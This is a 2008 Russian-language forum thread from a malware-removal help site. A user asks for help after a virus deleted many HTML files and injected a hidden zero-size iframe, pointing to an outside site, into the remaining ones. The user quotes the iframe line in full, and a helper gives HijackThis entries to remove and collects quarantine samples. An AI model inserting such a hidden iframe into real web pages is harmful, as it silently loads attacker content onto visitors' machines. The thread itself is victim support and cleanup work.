Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com

**Featus** · 26.02.2008, 14:53

Помогите, пожалуйста, уважаемые форумчане!
Какой-то вирус у меня поудалял многие htm-файлы. Обнаружилось это недавно, но напакостил он, видимо, с месяц назад. То, что никуда не было скопировано (например, на рабочий комп), восстановить, конечно, не удастся, но осталась другая фигня. Те файлы, которые еще остались (их, к счастью, осталось много), при открытии начинают загружать какой-то сайт

www.lovebak.com. При прочтении исходного кода любой страницы обнаруживается, что в конце везде стоит следующая строчка:
<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>
У всех измененных файлов одна и та же дата: 29.01.08 (видимо, тогда и были удалены многие файлы)
У меня несколько вопросов:
1. Сталкивался ли кто-нибудь с таким?
2. Вирус, видимо, уже давно удален, поскольку антивирус ничего не находит, но может ли загрузка этого lovebak привести к каким-нибудь проблемам?
3. В любом случае, можно ли как-нибудь удалить вышеприведенную строчку во всех htm-файлах? По одному это придется делать очень долго.
Заранее спасибо.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**rubin** · 26.02.2008, 15:51

http://virusinfo.info/showthread.php?t=1235

**Featus** · 27.02.2008, 18:08

Добавил 3 файла после проверки компьютера. Надеюсь, теперь подскажете, можно ли что-то сделать с htm-файлами. Вообще у меня подозрение, что удалил их сам антивирус (Касперский), который решил, что вылечить их нельзя. (А именно в день, который стоит в дате у всех измененных файлов, я делал проверку и обнаружил червя.) Но что делать с оставшимися, которые постоянно грузят какой-то lovebak.com?

**rubin** · 27.02.2008, 18:20

Пофиксить в HijackThis следующие строчки( http://virusinfo.info/showthread.php?t=4491 )

Код:

F2 - REG:system.ini: UserInit=userinit.exe,autorun.bat
O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - (no file)
O16 - DPF: {1D6711C8-7154-40BB-8380-3DEA45B69CBF} -
O20 - Winlogon Notify: winzoa32 - C:\WINDOWS\

autorun.bat - поищите через AVZ - добавьте в карантин
C:\wincmd\WINCMD32.EXE - и его в карантин

Карантин пришлите по правилам сюда - http://virusinfo.info/upload_virus.php?tid=18696

**Featus** · 28.02.2008, 14:07

Пофиксил. Добавил в карантин C:\wincmd\WINCMD32.EXE, а autorun.bat не добавляется. AVZ пишет: "Ошибка карантина файла, попытка прямого чтения". Что делать?

**rubin** · 28.02.2008, 19:11

Ну пришлите, что есть

**Featus** · 29.02.2008, 01:51

Послал.

**rubin** · 01.03.2008, 11:24

WINCMD32.EXE - чист

Проблема еще осталась?

**Featus** · 01.03.2008, 21:24

В htm-файлах по-прежнему стоит загрузка lovebak.com. В принципе, она не так уж достает, потому что я ее сразу же прерываю. Но все равно можно ли убрать строку загрузки из всех htm-файлов не вручную, по одному?

**CyberHelper** · 22.02.2009, 04:07

Статистика проведенного лечения:

Получено карантинов: 1
Обработано файлов: 1
В ходе лечения вредоносные программы в карантинах не обнаружены

Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com (заявка № 18696)

Опции темы

Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com

Итог лечения

Похожие темы

Многие .exe файлы стали открываться как текстовые в блокноте.

SMS virus блокирует загрузку и загрузку из безопасного режима

Не запускаются exe файлы и многие win программы

вирус убил загрузку Виндоус

Вирус Brontok блокирует загрузку программ из автозагрузки

Ваши права в разделе